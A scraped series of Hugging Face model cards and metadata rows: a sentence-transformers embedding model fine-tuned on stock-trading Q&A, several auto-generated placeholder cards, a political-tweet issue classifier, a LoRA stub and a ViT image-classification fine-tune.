gaining positive momentum and potentially generating profits by buying those assets
and selling underperforming assets.
- source_sentence: What role does back-testing play in refining event-driven trading
strategies using historical data and real-time analysis?
sentences:
- Genetic algorithms are well-suited for solving multi-objective optimization problems,
nonlinear and non-convex optimization problems, problems with high-dimensional
search spaces, and problems where traditional methods may struggle to find optimal
solutions.
- Risk management techniques such as position sizing, portfolio diversification,
and stop-loss orders are often used in quantitative momentum strategies to manage
downside risk and protect against large losses.
- Back-testing allows traders to evaluate the performance of event-driven trading
strategies using historical data, identify patterns, optimize parameters, and
refine strategies for real-time implementation.
datasets:
- yymYYM/stock_trading_QA
pipeline_tag: sentence-similarity
library_name: sentence-transformers
metrics:
- cosine_accuracy@3
- cosine_precision@3
- cosine_recall@3
- cosine_ndcg@3
- cosine_mrr@3
- cosine_map@3
model-index:
- name: SentenceTransformer based on BAAI/bge-base-en-v1.5
results:
- task:
type: information-retrieval
name: Information Retrieval
dataset:
name: Unknown
type: unknown
metrics:
- type: cosine_accuracy@3
value: 0.6750348675034867
name: Cosine Accuracy@3
- type: cosine_precision@3
value: 0.22501162250116222
name: Cosine Precision@3
- type: cosine_recall@3
value: 0.6750348675034867
name: Cosine Recall@3
- type: cosine_ndcg@3
value: 0.5838116811117793
name: Cosine Ndcg@3
- type: cosine_mrr@3
value: 0.5523012552301251
name: Cosine Mrr@3
- type: cosine_map@3
value: 0.5523012552301255
name: Cosine Map@3
---
# SentenceTransformer based on BAAI/bge-base-en-v1.5
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [BAAI/bge-base-en-v1.5](https://huggingface.co/BAAI/bge-base-en-v1.5) on the [stock_trading_qa](https://huggingface.co/datasets/yymYYM/stock_trading_QA) dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [BAAI/bge-base-en-v1.5](https://huggingface.co/BAAI/bge-base-en-v1.5) <!-- at revision a5beb1e3e68b9ab74eb54cfd186867f64f240e1a -->
- **Maximum Sequence Length:** 512 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
- **Training Dataset:**
- [stock_trading_qa](https://huggingface.co/datasets/yymYYM/stock_trading_QA)
- **Language:** en
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': True}) with Transformer model: BertModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': True, 'pooling_mode_mean_tokens': False, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
(2): Normalize()
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("iamleonie/leonies-test")
# Run inference
sentences = [
'What role does back-testing play in refining event-driven trading strategies using historical data and real-time analysis?',
'Back-testing allows traders to evaluate the performance of event-driven trading strategies using historical data, identify patterns, optimize parameters, and refine strategies for real-time implementation.',
'Risk management techniques such as position sizing, portfolio diversification, and stop-loss orders are often used in quantitative momentum strategies to manage downside risk and protect against large losses.',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
```
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
## Evaluation
### Metrics
#### Information Retrieval
* Evaluated with [<code>InformationRetrievalEvaluator</code>](https://sbert.net/docs/package_reference/sentence_transformer/evaluation.html#sentence_transformers.evaluation.InformationRetrievalEvaluator)
| Metric | Value |
|:-------------------|:-----------|
| cosine_accuracy@3 | 0.675 |
| cosine_precision@3 | 0.225 |
| cosine_recall@3 | 0.675 |
| **cosine_ndcg@3** | **0.5838** |
| cosine_mrr@3 | 0.5523 |
| cosine_map@3 | 0.5523 |
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### stock_trading_qa
* Dataset: [stock_trading_qa](https://huggingface.co/datasets/yymYYM/stock_trading_QA) at [35dab2e](https://huggingface.co/datasets/yymYYM/stock_trading_QA/tree/35dab2e25b6da10842cfb0f832b715cab3765727)
* Size: 6,448 training samples
* Columns: <code>anchor</code> and <code>context</code>
* Approximate statistics based on the first 1000 samples:
| | anchor | context |
|:--------|:----------------------------------------------------------------------------------|:-----------------------------------------------------------------------------------|
| type | string | string |
| details | <ul><li>min: 7 tokens</li><li>mean: 15.83 tokens</li><li>max: 39 tokens</li></ul> | <ul><li>min: 17 tokens</li><li>mean: 34.67 tokens</li><li>max: 59 tokens</li></ul> |
* Samples:
| anchor | context |
|:------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>How should I approach investing in a volatile stock market?</code> | <code>Diversify your portfolio, invest in stable companies, consider dollar-cost averaging, and stay informed about market trends to make informed trading decisions.</code> |
| <code>What is the role of cross-validation in assessing the performance of time series forecasting models for stock market trends?</code> | <code>Cross-validation helps evaluate the generalization ability of forecasting models by partitioning historical data into training and validation sets, ensuring that the model's performance is robust and reliable for future predictions.</code> |
| <code>What role does correlation play in statistical arbitrage and pair trading?</code> | <code>Correlation measures the relationship between asset prices and helps traders identify pairs that exhibit a stable price relationship suitable for pair trading.</code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim"
}
```
### Evaluation Dataset
#### stock_trading_qa
* Dataset: [stock_trading_qa](https://huggingface.co/datasets/yymYYM/stock_trading_QA) at [35dab2e](https://huggingface.co/datasets/yymYYM/stock_trading_QA/tree/35dab2e25b6da10842cfb0f832b715cab3765727)
* Size: 717 evaluation samples
* Columns: <code>anchor</code> and <code>context</code>
* Approximate statistics based on the first 717 samples:
| | anchor | context |
|:--------|:----------------------------------------------------------------------------------|:-----------------------------------------------------------------------------------|
| type | string | string |
| details | <ul><li>min: 7 tokens</li><li>mean: 15.96 tokens</li><li>max: 30 tokens</li></ul> | <ul><li>min: 17 tokens</li><li>mean: 35.03 tokens</li><li>max: 62 tokens</li></ul> |
* Samples:
| anchor | context |
|:----------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>How can anomaly detection in stock prices be used to identify market inefficiencies and opportunities for arbitrage?</code> | <code>Anomaly detection can help identify market inefficiencies by spotting mispricings and opportunities for arbitrage, where traders can exploit price differentials to make profits by trading on anomalies.</code> |
| <code>How do traders interpret the Head and Shoulders pattern as a trading signal?</code> | <code>The Head and Shoulders pattern is a reversal pattern with three peaks, where the middle peak (head) is higher than the other two (shoulders), signaling a potential trend reversal and offering a bearish trading signal.</code> |
| <code>How do traders use Fibonacci levels as trading signals?</code> | <code>Fibonacci levels are used as trading signals to identify potential support and resistance levels, trend reversals, and price targets in financial markets.</code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim"
}
```
### Training Hyperparameters
#### Non-Default Hyperparameters
- `eval_strategy`: steps
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 16
- `gradient_accumulation_steps`: 16
- `learning_rate`: 2e-05
- `num_train_epochs`: 4
- `lr_scheduler_type`: cosine
- `warmup_ratio`: 0.1
- `fp16`: True
- `optim`: adamw_8bit
- `batch_sampler`: no_duplicates
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: steps
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 16
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 16
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 2e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 4
- `max_steps`: -1
- `lr_scheduler_type`: cosine
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: True
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_8bit
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: no_duplicates
- `multi_dataset_batch_sampler`: proportional
</details>
### Training Logs
| Epoch | Step | Training Loss | Validation Loss | cosine_ndcg@3 |
|:------:|:----:|:-------------:|:---------------:|:-------------:|
| -1 | -1 | - | - | 0.4451 |
| 0.3970 | 10 | 5.7817 | 0.0765 | 0.5278 |
| 0.7940 | 20 | 1.295 | 0.0251 | 0.5608 |
| 1.1588 | 30 | 0.6208 | 0.0209 | 0.5771 |
| 1.5558 | 40 | 0.5701 | 0.0183 | 0.5789 |
| 1.9529 | 50 | 0.4546 | 0.0171 | 0.5882 |
| 2.3176 | 60 | 0.2861 | 0.0160 | 0.5839 |
| 2.7146 | 70 | 0.3315 | 0.0154 | 0.5818 |
| 3.0794 | 80 | 0.3179 | 0.0152 | 0.5852 |
| 3.4764 | 90 | 0.367 | 0.0150 | 0.5843 |
| 3.8734 | 100 | 0.354 | 0.0150 | 0.5838 |
### Framework Versions
- Python: 3.11.12
- Sentence Transformers: 4.1.0
- Transformers: 4.52.4
- PyTorch: 2.6.0+cu124
- Accelerate: 1.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### MultipleNegativesRankingLoss
```bibtex
@misc{henderson2017efficient,
title={Efficient Natural Language Response Suggestion for Smart Reply},
author={Matthew Henderson and Rami Al-Rfou and Brian Strope and Yun-hsuan Sung and Laszlo Lukacs and Ruiqi Guo and Sanjiv Kumar and Balint Miklos and Ray Kurzweil},
year={2017},
eprint={1705.00652},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
--> |
rziga/llmdet_tiny | rziga | 2025-05-30T10:08:58Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"mm-grounding-dino",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-05-30T10:07:35Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
kallilikhitha123/llama-finetuned-test-causal-30-05-2025 | kallilikhitha123 | 2025-05-30T10:07:02Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"bitsandbytes",
"region:us"
] | text-generation | 2025-05-30T09:48:49Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
z-dickson/issue_classification_tweets | z-dickson | 2025-05-30T10:06:07Z | 5 | 1 | transformers | [
"transformers",
"safetensors",
"bert",
"text-classification",
"politics",
"twitter",
"tweets",
"issues",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-05-23T10:06:25Z | ---
license: mit
tags:
- politics
- twitter
- tweets
- issues
---
This model classified politicians' tweets in English according to nine issues:
- Health
- Economy
- Immigration
- Crime
- Education
- Taxes
- International Affairs
- Defense
- Environment
The model was used to classify Twitter messages to study responsiveness to public issue salience in the following article: https://doi.org/10.1017/S153759272400104X.
If you find the model useful for your work, it would be great if you could cite it:
- APA: Dickson, Z. P. (2024). The Gender Gap in Elite-Voter Responsiveness Online. Perspectives on Politics, 1-17.
- BibTeX: @article{dickson2024gender,
title={The Gender Gap in Elite-Voter Responsiveness Online},
author={Dickson, Zachary P},
journal={Perspectives on Politics},
pages={1--17},
year={2024},
publisher={Cambridge University Press}
} |
MaestrAI/camelia_roberts-lora-1748599546 | MaestrAI | 2025-05-30T10:05:47Z | 0 | 0 | null | [
"region:us"
] | null | 2025-05-30T10:05:46Z | # camelia_roberts LORA Model
This is a LORA model for character Camelia Roberts
Created at 2025-05-30 12:05:47
|
Karandeepsingh/Deep | Karandeepsingh | 2025-05-30T10:04:57Z | 0 | 0 | null | [
"license:apache-2.0",
"region:us"
] | null | 2025-05-30T10:04:57Z | ---
license: apache-2.0
---
|
tungduong261204/DPO_2000_v2 | tungduong261204 | 2025-05-30T10:02:01Z | 0 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:unsloth/Llama-3.2-1B",
"base_model:adapter:unsloth/Llama-3.2-1B",
"region:us"
] | null | 2025-05-30T09:42:57Z | ---
base_model: unsloth/Llama-3.2-1B
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.2 |
Jedrzej-Smok/2025-05-30_11-48-34 | Jedrzej-Smok | 2025-05-30T10:01:21Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"vit",
"image-classification",
"generated_from_trainer",
"dataset:generator",
"base_model:google/vit-base-patch16-224-in21k",
"base_model:finetune:google/vit-base-patch16-224-in21k",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | image-classification | 2025-05-30T09:48:39Z | ---
library_name: transformers
license: apache-2.0
base_model: google/vit-base-patch16-224-in21k
tags:
- generated_from_trainer
datasets:
- generator
metrics:
- accuracy
model-index:
- name: 2025-05-30_11-48-34
results:
- task:
name: Image Classification
type: image-classification
dataset:
name: generator
type: generator
config: default
split: test
args: default
metrics:
- name: Accuracy
type: accuracy
value: 1.0
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# 2025-05-30_11-48-34
This model is a fine-tuned version of [google/vit-base-patch16-224-in21k](https://huggingface.co/google/vit-base-patch16-224-in21k) on the generator dataset.
It achieves the following results on the evaluation set:
- Loss: 0.3985
- Accuracy: 1.0
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 256
- eval_batch_size: 256
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 10
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy |
|:-------------:|:-----:|:----:|:---------------:|:--------:|
| 0.7264 | 1.0 | 1 | 0.7131 | 0.5 |
| 0.7239 | 2.0 | 2 | 0.6431 | 0.5 |
| 0.6495 | 3.0 | 3 | 0.5960 | 0.5833 |
| 0.5979 | 4.0 | 4 | 0.5529 | 0.8333 |
| 0.5506 | 5.0 | 5 | 0.5156 | 1.0 |
| 0.5064 | 6.0 | 6 | 0.4762 | 1.0 |
| 0.4715 | 7.0 | 7 | 0.4439 | 1.0 |
| 0.4309 | 8.0 | 8 | 0.4305 | 1.0 |
| 0.4172 | 9.0 | 9 | 0.4192 | 1.0 |
| 0.3853 | 10.0 | 10 | 0.3985 | 1.0 |
### Framework versions
- Transformers 4.52.3
- Pytorch 2.7.0+cu126
- Datasets 3.6.0
